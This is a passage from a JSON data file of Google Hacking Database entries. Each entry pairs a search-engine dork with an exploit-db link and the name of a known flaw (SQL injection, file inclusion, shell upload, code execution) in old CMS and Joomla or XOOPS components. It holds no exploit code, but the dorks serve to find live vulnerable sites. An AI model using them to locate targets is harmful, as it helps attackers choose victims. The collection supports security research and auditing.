"querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+SLAED+CMS+%C2%A9+2005-2008+SLAED.+All+rights+reserved.", "shortDescription": "Powered by SLAED CMS \u00a9 2005-2008 SLAED. All rights reserved.", "textualDescription": "Slaed CMS v4 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11596" }, { "signatureReferenceNumber": "3266", "link": "https://www.exploit-db.com/ghdb/3266/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=index.php%3Foption%3Dcom_vr", "shortDescription": "index.php?option=com_vr", "textualDescription": "Joomla Component QuickTime VR 0.1 Remote SQL Injection: http://www.exploit-db.com/exploits/5994" }, { "signatureReferenceNumber": "3268", "link": "https://www.exploit-db.com/ghdb/3268/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22BioScripts%22", "shortDescription": "\"BioScripts\"", "textualDescription": "MiniTwitter 0.2b Multiple SQL Injection Vulnerabilities - CVE: 2009-2573: http://www.exploit-db.com/exploits/8586" }, { "signatureReferenceNumber": "3270", "link": "https://www.exploit-db.com/ghdb/3270/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=myAlbum-P+2.0", "shortDescription": "myAlbum-P 2.0", "textualDescription": "XOOPS Module myAlbum-P" }, { "signatureReferenceNumber": "3271", "link": "https://www.exploit-db.com/ghdb/3271/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=[+Software+Directory+Powered+by+SoftDirec+1.05+]", "shortDescription": "[ Software Directory Powered by SoftDirec 1.05 ]", "textualDescription": "Soft Direct v1.05 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11189" }, { "signatureReferenceNumber": "3272", "link": "https://www.exploit-db.com/ghdb/3272/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+vBulletin+3.8.6", "shortDescription": "powered by vBulletin 3.8.6", "textualDescription": "vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability: http://www.exploit-db.com/exploits/14455" }, { "signatureReferenceNumber": "3274", "link": "https://www.exploit-db.com/ghdb/3274/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22By+Geeklog%22+%22Created+this+page+in%22+%2Bseconds+%2Bpowered", "shortDescription": "\"By Geeklog\" \"Created this page in\" +seconds +powered", "textualDescription": "Geeklog v1.6.0sr2 - Remote File Upload: http://www.exploit-db.com/exploits/9855" }, { "signatureReferenceNumber": "3275", "link": "https://www.exploit-db.com/ghdb/3275/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22xampp/biorhythm.php%22", "shortDescription": "inurl:\"xampp/biorhythm.php\"", "textualDescription": "XAMPP 1.7.3 multiple vulnerabilites: http://www.exploit-db.com/exploits/15370" }, { "signatureReferenceNumber": "3276", "link": "https://www.exploit-db.com/ghdb/3276/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+2532|Gigs+v1.2.2", "shortDescription": "Powered by 2532|Gigs v1.2.2", "textualDescription": "2532|Gigs 1.2.2 Stable Multiple Remote Vulnerabilities - CVE: 2008-6901: http://www.exploit-db.com/exploits/7510" }, { "signatureReferenceNumber": "3277", "link": "https://www.exploit-db.com/ghdb/3277/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+bp+blog+6.0%22", "shortDescription": "\"Powered by bp blog 6.0\"", "textualDescription": "BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability - CVE: 2008-2554: http://www.exploit-db.com/exploits/5705" }, { "signatureReferenceNumber": "3278", "link": "https://www.exploit-db.com/ghdb/3278/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_soundset%22", "shortDescription": "inurl:\"com_soundset\"", "textualDescription": "Joomla CB Resume Builder SQL Injection - CVE: 2009-3645: http://www.exploit-db.com/exploits/10064" }, { "signatureReferenceNumber": "3279", "link": "https://www.exploit-db.com/ghdb/3279/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/modules/zmagazine/%22", "shortDescription": "inurl:\"/modules/zmagazine/\"", "textualDescription": "XOOPS Module Zmagazine 1.0 (print.php) Remote SQL Injection - CVE: 2005-0725: http://www.exploit-db.com/exploits/3646" }, { "signatureReferenceNumber": "3281", "link": "https://www.exploit-db.com/ghdb/3281/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+iScripts+eSwap.", "shortDescription": "Powered by iScripts eSwap.", "textualDescription": "iScripts eSwap v2.0 sqli and xss vulnerability: http://www.exploit-db.com/exploits/13740" }, { "signatureReferenceNumber": "3282", "link": "https://www.exploit-db.com/ghdb/3282/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Online+Grades%22", "shortDescription": "\"Powered by Online Grades\"", "textualDescription": "Online Grades & Attendance 3.2.6 Multiple Local File Inclusion Vulns - CVE: 2009-2037: http://www.exploit-db.com/exploits/8853" }, { "signatureReferenceNumber": "3283", "link": "https://www.exploit-db.com/ghdb/3283/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/modules/wflinks", "shortDescription": "inurl:/modules/wflinks", "textualDescription": "XOOPS Module WF-Links 1.03 (cid) Remote SQL Injection - CVE: 2007-2373: http://www.exploit-db.com/exploits/3670" }, { "signatureReferenceNumber": "3285", "link": "https://www.exploit-db.com/ghdb/3285/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/modules/glossaire/%22", "shortDescription": "inurl:\"/modules/glossaire/\"", "textualDescription": "XOOPS Module Glossarie" }, { "signatureReferenceNumber": "3286", "link": "https://www.exploit-db.com/ghdb/3286/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=index.php%3Foption%3Dcom_is", "shortDescription": "index.php?option=com_is", "textualDescription": "Joomla Component is 1.0.1 Multiple Remote SQL Injection: http://www.exploit-db.com/exploits/5995" }, { "signatureReferenceNumber": "3287", "link": "https://www.exploit-db.com/ghdb/3287/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/modules/myconference/%22", "shortDescription": "inurl:\"/modules/myconference/\"", "textualDescription": "XOOPS Module MyConference 1.0 (index.php) SQL Injection - CVE: 2007-2737: http://www.exploit-db.com/exploits/3933" }, { "signatureReferenceNumber": "3288", "link": "https://www.exploit-db.com/ghdb/3288/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_gameserver%22", "shortDescription": "inurl:\"com_gameserver\"", "textualDescription": "Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability - CVE: 2009-3063: http://www.exploit-db.com/exploits/9571" }, { "signatureReferenceNumber": "3289", "link": "https://www.exploit-db.com/ghdb/3289/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Ninja+Designs+This+is+a+port+of+WordPress", "shortDescription": "Powered by Ninja Designs This is a port of WordPress", "textualDescription": "Ninja Blog v4.8 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/10991" }, { "signatureReferenceNumber": "3290", "link": "https://www.exploit-db.com/ghdb/3290/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_annonces", "shortDescription": "inurl:com_annonces", "textualDescription": "Joomla Component com_annonces Upload Vulnerability: http://www.exploit-db.com/exploits/13748" }, { "signatureReferenceNumber": "3294", "link": "https://www.exploit-db.com/ghdb/3294/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+1999-2010+Rocksalt+International+Pty+Ltd.+All+rights+reserved", "shortDescription": "Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved", "textualDescription": "VP-ASP Shopping Cart 7.0 DB Download Vulnerability: http://www.exploit-db.com/exploits/11018" }, { "signatureReferenceNumber": "3295", "link": "https://www.exploit-db.com/ghdb/3295/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22fclick.php%3Ffid%22", "shortDescription": "inurl:\"fclick.php?fid\"", "textualDescription": "Fast Click (1.1.3 , 2.3.8) (show.php) Remote File Inclusion - CVE: 2006-2175: http://www.exploit-db.com/exploits/1740" }, { "signatureReferenceNumber": "3296", "link": "https://www.exploit-db.com/ghdb/3296/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/modules/wfsection/%22", "shortDescription": "inurl:\"/modules/wfsection/\"", "textualDescription": "http://www.exploit-db.com/exploits/3644" }, { "signatureReferenceNumber": "3297", "link": "https://www.exploit-db.com/ghdb/3297/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Forums+W-Agora", "shortDescription": "Powered by Forums W-Agora", "textualDescription": "W-Agora v.4.2.1 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/10999" }, { "signatureReferenceNumber": "3298", "link": "https://www.exploit-db.com/ghdb/3298/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22phpbb+-+auction%22+inurl:%22auction%22", "shortDescription": "intext:\"phpbb - auction\" inurl:\"auction\"", "textualDescription": "Auction 1.3m (phpbb_root_path) Remote File Include - CVE: 2006-2245: http://www.exploit-db.com/exploits/1747" }, { "signatureReferenceNumber": "3301", "link": "https://www.exploit-db.com/ghdb/3301/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+DreamAccount+3.1%22", "shortDescription": "\"powered by DreamAccount 3.1\"", "textualDescription": "DreamAccount 3.1 (auth.api.php) Remote File Include - CVE: 2006-6232: http://www.exploit-db.com/exploits/1954" }, { "signatureReferenceNumber": "3302", "link": "https://www.exploit-db.com/ghdb/3302/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22article.download.php%22", "shortDescription": "allinurl:\"article.download.php\"", "textualDescription": "Star Articles 6.0 Remote File Upload Vulnerability - CVE: 2008-7076: http://www.exploit-db.com/exploits/7251" }, { "signatureReferenceNumber": "3304", "link": "https://www.exploit-db.com/ghdb/3304/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jp_jobs", "shortDescription": "inurl:com_jp_jobs", "textualDescription": "Joomla Component com_jp_jobs 1.2.0 (id) SQL Injection Vulnerability - CVE: 2010-1350: http://www.exploit-db.com/exploits/12191" }, { "signatureReferenceNumber": "3306", "link": "https://www.exploit-db.com/ghdb/3306/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:admbook+intitle:version+filetype:php", "shortDescription": "intitle:admbook intitle:version filetype:php", "textualDescription": "Admbook 1.2.2 (X-Forwarded-For) Remote Command Execution - CVE: 2006-0852: http://www.exploit-db.com/exploits/1512" }, { "signatureReferenceNumber": "3307", "link": "https://www.exploit-db.com/ghdb/3307/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Cms.tut.su,+2009+g.%22", "shortDescription": "\"Cms.tut.su, 2009 g.\"", "textualDescription": "CMS Chainuk 1.2 Multiple Remote Vulnerabilities - CVE: 2009-2333: http://www.exploit-db.com/exploits/9069" }, { "signatureReferenceNumber": "3308", "link": "https://www.exploit-db.com/ghdb/3308/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_icrmbasic%22", "shortDescription": "inurl:\"com_icrmbasic\"", "textualDescription": "Joomla IRCm Basic SQL Injection: http://www.exploit-db.com/exploits/9812" }, { "signatureReferenceNumber": "3309", "link": "https://www.exploit-db.com/ghdb/3309/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+Aqua+Cms%22", "shortDescription": "\"Powered By Aqua Cms\"", "textualDescription": "Aqua CMS (username) SQL Injection Vulnerability - CVE: 2009-1317: http://www.exploit-db.com/exploits/8432" }, { "signatureReferenceNumber": "3310", "link": "https://www.exploit-db.com/ghdb/3310/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_jbudgetsmagic%22", "shortDescription": "inurl:\"com_jbudgetsmagic\"", "textualDescription": "Joomla com_jbudgetsmagic SQL injection vulnerability - CVE: 2009-3332: http://www.exploit-db.com/exploits/9723" }, { "signatureReferenceNumber": "3311", "link": "https://www.exploit-db.com/ghdb/3311/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_soundset%22", "shortDescription": "inurl:\"com_soundset\"", "textualDescription": "Joomla Soundset 1.0 SQL Injection - CVE: 2009-3644: http://www.exploit-db.com/exploits/10067" }, { "signatureReferenceNumber": "3312", "link": "https://www.exploit-db.com/ghdb/3312/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+MyPHP+Forum+v3.0", "shortDescription": "Powered by MyPHP Forum v3.0", "textualDescription": "MyPHP Forum 3.0 (Final) Remote SQL Injection Vulnerability - CVE: 2008-0099: http://www.exploit-db.com/exploits/4831" }, { "signatureReferenceNumber": "3313", "link": "https://www.exploit-db.com/ghdb/3313/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+CMS.GE%22", "shortDescription": "\"Powered by CMS.GE\"", "textualDescription": "Binn SBuilder (nid) Remote Blind SQL Injection Vulnerability - CVE: 2008-0253: http://www.exploit-db.com/exploits/4904" }, { "signatureReferenceNumber": "3314", "link": "https://www.exploit-db.com/ghdb/3314/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=index.php%3Foption%3Dcom_mambads", "shortDescription": "index.php?option=com_mambads", "textualDescription": "Mambo Component mambads" }, { "signatureReferenceNumber": "3315", "link": "https://www.exploit-db.com/ghdb/3315/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22AlumniServer+project%22", "shortDescription": "\"AlumniServer project\"", "textualDescription": "AlumniServer 1.0.1 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9019" }, { "signatureReferenceNumber": "3316", "link": "https://www.exploit-db.com/ghdb/3316/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Site+powered+by+GuppY%22", "shortDescription": "\"Site powered by GuppY\"", "textualDescription": "GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion Vulnerability - CVE: 2007-5844: http://www.exploit-db.com/exploits/4602" }, { "signatureReferenceNumber": "3318", "link": "https://www.exploit-db.com/ghdb/3318/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_surveymanager%22", "shortDescription": "inurl:\"com_surveymanager\"", "textualDescription": "Joomla com_surveymanager SQL injection vulnerability - CVE: 2009-3325: http://www.exploit-db.com/exploits/9721" }, { "signatureReferenceNumber": "3319", "link": "https://www.exploit-db.com/ghdb/3319/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+PHP+F1+(Max's+Image+Uploader)", "shortDescription": "Powered by PHP F1 (Max's Image Uploader)", "textualDescription": "Max's Image Uploader Shell Upload Vulnerability - CVE: 2010-0390: http://www.exploit-db.com/exploits/11169" }, { "signatureReferenceNumber": "3320", "link": "https://www.exploit-db.com/ghdb/3320/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22%3Foption%3Dcom_bsadv%22", "shortDescription": "inurl:\"?option=com_bsadv\"", "textualDescription": "Joomla Boy Scout Advancement 0.3 (id) SQL Injection - CVE: 2009-2290: http://www.exploit-db.com/exploits/8779" }, { "signatureReferenceNumber": "3321", "link": "https://www.exploit-db.com/ghdb/3321/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PHP+Live!+v3.3%22", "shortDescription": "\"Powered by PHP Live! v3.3\"", "textualDescription": "PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability - CVE: 2009-3062: http://www.exploit-db.com/exploits/9578" }, { "signatureReferenceNumber": "3322", "link": "https://www.exploit-db.com/ghdb/3322/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+PHP+F1+(Max's+Photo+Album)", "shortDescription": "Powered by PHP F1 (Max's Photo Album)", "textualDescription": "Max's Photo Album Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11557" }, { "signatureReferenceNumber": "3323", "link": "https://www.exploit-db.com/ghdb/3323/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=insite:+SmarterMail+Enterprise+7.1", "shortDescription": "insite: SmarterMail Enterprise 7.1", "textualDescription": "SmarterMail 7.1.3876 Directory Traversal Vulnerability - CVE: 2010-3486: http://www.exploit-db.com/exploits/15048" }, { "signatureReferenceNumber": "3324", "link": "https://www.exploit-db.com/ghdb/3324/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+LightNEasy%22", "shortDescription": "\"Powered by LightNEasy\"", "textualDescription": "LightNEasy 3.1.x Multiple Vulnerabilite: http://www.exploit-db.com/exploits/12322" }, { "signatureReferenceNumber": "3325", "link": "https://www.exploit-db.com/ghdb/3325/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Online+Grades%22", "shortDescription": "\"Powered by Online Grades\"", "textualDescription": "Online Grades & Attendance 3.2.6 Multiple SQL Injection Vulnerabilities - CVE: 2009-2598: http://www.exploit-db.com/exploits/8844" }, { "signatureReferenceNumber": "3326", "link": "https://www.exploit-db.com/ghdb/3326/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Copyright+KerviNet%22", "shortDescription": "\"Copyright KerviNet\"", "textualDescription": "KerviNet Forum 1.1 Multiple Remote Vulnerabilities - CVE: 2009-2326: http://www.exploit-db.com/exploits/9068" }, { "signatureReferenceNumber": "3328", "link": "https://www.exploit-db.com/ghdb/3328/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:option%3Dcom_rsmonials", "shortDescription": "allinurl:option=com_rsmonials", "textualDescription": "Joomla Component rsmonials Remote Cross Site Scripting: http://www.exploit-db.com/exploits/8517" }, { "signatureReferenceNumber": "3329", "link": "https://www.exploit-db.com/ghdb/3329/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+F3Site%22", "shortDescription": "\"Powered by F3Site\"", "textualDescription": "F3Site 2.1 Remote Code Execution - CVE: 2007-0763: http://www.exploit-db.com/exploits/3255" }, { "signatureReferenceNumber": "3331", "link": "https://www.exploit-db.com/ghdb/3331/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+ProjectCMS%22", "shortDescription": "\"Powered by ProjectCMS\"", "textualDescription": "ProjectCMS 1.1b Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8608" }, { "signatureReferenceNumber": "3332", "link": "https://www.exploit-db.com/ghdb/3332/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PunBB%22", "shortDescription": "\"Powered by PunBB\"", "textualDescription": "PunBB Extension Attachment 1.0.2 SQL Injection: http://www.exploit-db.com/exploits/9849" }, { "signatureReferenceNumber": "3334", "link": "https://www.exploit-db.com/ghdb/3334/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22The+Merchant+Project%22", "shortDescription": "\"The Merchant Project\"", "textualDescription": "The Merchant" }, { "signatureReferenceNumber": "3335", "link": "https://www.exploit-db.com/ghdb/3335/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Developed+by+rbk%22", "shortDescription": "\"Developed by rbk\"", "textualDescription": "InfiniX 1.2.003 Multiple SQL Injection Vulnerabilities - CVE: 2009-2451: http://www.exploit-db.com/exploits/8558" }, { "signatureReferenceNumber": "3338", "link": "https://www.exploit-db.com/ghdb/3338/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Elvin+Bug+Tracking+Server.", "shortDescription": "Powered by Elvin Bug Tracking Server.", "textualDescription": "Elvin BTS 1.2.0 Multiple Remote Vulnerabilities - CVE: 2009-2123: http://www.exploit-db.com/exploits/8953" }, { "signatureReferenceNumber": "3339", "link": "https://www.exploit-db.com/ghdb/3339/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22Directory+Listing+For+/%22+%2B+inurl:webdav+tomcat", "shortDescription": "intitle:\"Directory Listing For /\" + inurl:webdav tomcat", "textualDescription": "Apache Tomcat (webdav) Remote File Disclosure: http://www.exploit-db.com/exploits/4552" }, { "signatureReferenceNumber": "3340", "link": "https://www.exploit-db.com/ghdb/3340/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+By+PHPFanBase", "shortDescription": "Powered By PHPFanBase", "textualDescription": "PHPFanBase 2.x (protection.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2957" }, { "signatureReferenceNumber": "3341", "link": "https://www.exploit-db.com/ghdb/3341/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+wpQuiz%22", "shortDescription": "\"Powered by wpQuiz\"", "textualDescription": "wpQuiz 2.7 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-6172: http://www.exploit-db.com/exploits/4668" }, { "signatureReferenceNumber": "3343", "link": "https://www.exploit-db.com/ghdb/3343/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_ezine%22", "shortDescription": "inurl:\"com_ezine\"", "textualDescription": "Joomla / Mambo Component com_ezine v2.1 Remote File Include Vulnerability - CVE: 2009-4094: http://www.exploit-db.com/exploits/10178" }, { "signatureReferenceNumber": "3346", "link": "https://www.exploit-db.com/ghdb/3346/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+ClanTiger%22", "shortDescription": "\"Powered by ClanTiger\"", "textualDescription": "ClanTiger 1.1.1 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8472" }, { "signatureReferenceNumber": "3347", "link": "https://www.exploit-db.com/ghdb/3347/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Search+Projects%22+intitle:%22The+ultimate+project+website%22", "shortDescription": "\"Search Projects\" intitle:\"The ultimate project website\"", "textualDescription": "Softbiz Freelancers Script v.1 Remote SQL Injection - CVE: 2007-6124: http://www.exploit-db.com/exploits/4660" }, { "signatureReferenceNumber": "3348", "link": "https://www.exploit-db.com/ghdb/3348/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Power+by:RichStrong+CMS%22", "shortDescription": "\"Power by:RichStrong CMS\"", "textualDescription": "RichStrong CMS (showproduct.asp cat) Remote SQL Injection - CVE: 2008-0291: http://www.exploit-db.com/exploits/4910" }, { "signatureReferenceNumber": "3350", "link": "https://www.exploit-db.com/ghdb/3350/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=powered:powered+by+CMS", "shortDescription": "powered:powered by CMS", "textualDescription": "TinyMCE WYSIWYG Editor Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11358" }, { "signatureReferenceNumber": "3351", "link": "https://www.exploit-db.com/ghdb/3351/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Grayscale+Blog%22", "shortDescription": "\"Powered by Grayscale Blog\"", "textualDescription": "Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns - CVE: 2007-1432: http://www.exploit-db.com/exploits/3447" }, { "signatureReferenceNumber": "3353", "link": "https://www.exploit-db.com/ghdb/3353/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+UCenter+1.5.0+%C2%A9+2001+-+2008+Comsenz+Inc.", "shortDescription": "Powered by UCenter 1.5.0 \u00a9 2001 - 2008 Comsenz Inc.", "textualDescription": "Ucenter Projekt 2.0 Insecure crossdomain (XSS) Vulnerability: http://www.exploit-db.com/exploits/12455" }, { "signatureReferenceNumber": "3354", "link": "https://www.exploit-db.com/ghdb/3354/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:roschedule.php", "shortDescription": "inurl:roschedule.php", "textualDescription": "phpScheduleIt 1.2.10 (reserve.php) Remote Code Execution - CVE: 2008-6132: http://www.exploit-db.com/exploits/6646" }, { "signatureReferenceNumber": "3355", "link": "https://www.exploit-db.com/ghdb/3355/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22PHP+Project+Management+0.8.10%22", "shortDescription": "\"PHP Project Management 0.8.10\"", "textualDescription": "PHP Project Management 0.8.10 Multiple RFI / LFI Vulnerabilities - CVE: 2007-5641: http://www.exploit-db.com/exploits/4549" }, { "signatureReferenceNumber": "3356", "link": "https://www.exploit-db.com/ghdb/3356/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_seyret", "shortDescription": "inurl:com_seyret", "textualDescription": "Joomla Seyret Video Component (com_seyret) Blind SQL Injection: http://www.exploit-db.com/exploits/14172" }, { "signatureReferenceNumber": "3359", "link": "https://www.exploit-db.com/ghdb/3359/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22download+this+free+gallery+at+matteobinda.com%22", "shortDescription": "\"download this free gallery at matteobinda.com\"", "textualDescription": "ASP Photo Gallery 1.0 Multiple SQL Injection Vulnerabilities - CVE: 2008-0256: http://www.exploit-db.com/exploits/4900" }, { "signatureReferenceNumber": "3361", "link": "https://www.exploit-db.com/ghdb/3361/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Dodo,+Bubo+%26+Misty.+Feed+us!", "shortDescription": "Powered by Dodo, Bubo & Misty. Feed us!", "textualDescription": "Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability: http://www.exploit-db.com/exploits/11460" }, { "signatureReferenceNumber": "3363", "link": "https://www.exploit-db.com/ghdb/3363/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Nwahy.com+2.1+,+inurl:'add-site.html'", "shortDescription": "Nwahy.com 2.1 , inurl:'add-site.html'", "textualDescription": "Nwahy Dir 2.1 Arbitrary Change Admin Password: http://www.exploit-db.com/exploits/9087" }, { "signatureReferenceNumber": "3364", "link": "https://www.exploit-db.com/ghdb/3364/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_jombib", "shortDescription": "inurl:index.php?option=com_jombib", "textualDescription": "Joomla Component BibTeX 1.3 Remote Blind SQL Injection - CVE: 2007-4502: http://www.exploit-db.com/exploits/4310" }, { "signatureReferenceNumber": "3366", "link": "https://www.exploit-db.com/ghdb/3366/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:%22shop.htm%3FshopMGID%3D%22", "shortDescription": "allinurl:\"shop.htm?shopMGID=\"", "textualDescription": "CMS Ignition SQL Injection: http://www.exploit-db.com/exploits/14471" }, { "signatureReferenceNumber": "3367", "link": "https://www.exploit-db.com/ghdb/3367/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22By+Geeklog%22+%22Created+this+page+in%22+%2Bseconds+%2Bpowered+inurl:public_html", "shortDescription": "\"By Geeklog\" \"Created this page in\" +seconds +powered inurl:public_html", "textualDescription": "Geeklog 1.6.0sr1 Remote Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/9505" }, { "signatureReferenceNumber": "3368", "link": "https://www.exploit-db.com/ghdb/3368/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22nukeai+beta3%22", "shortDescription": "\"nukeai beta3\"", "textualDescription": "PHP-Nuke NukeAI Module 3b (util.php) Remote File Include - CVE: 2006-6255: http://www.exploit-db.com/exploits/2843" }, { "signatureReferenceNumber": "3369", "link": "https://www.exploit-db.com/ghdb/3369/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+UPB%22", "shortDescription": "\"Powered by UPB\"", "textualDescription": "Ultimate PHP Board 2.0b1 (chat/login.php) Code Execution: http://www.exploit-db.com/exploits/2999" }, { "signatureReferenceNumber": "3370", "link": "https://www.exploit-db.com/ghdb/3370/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22owl+intranet+*+owl%22+0.82", "shortDescription": "intitle:\"owl intranet * owl\" 0.82", "textualDescription": "OWL Intranet Engine 0.82 (xrms_file_root) Code Execution - CVE: 2006-1149: 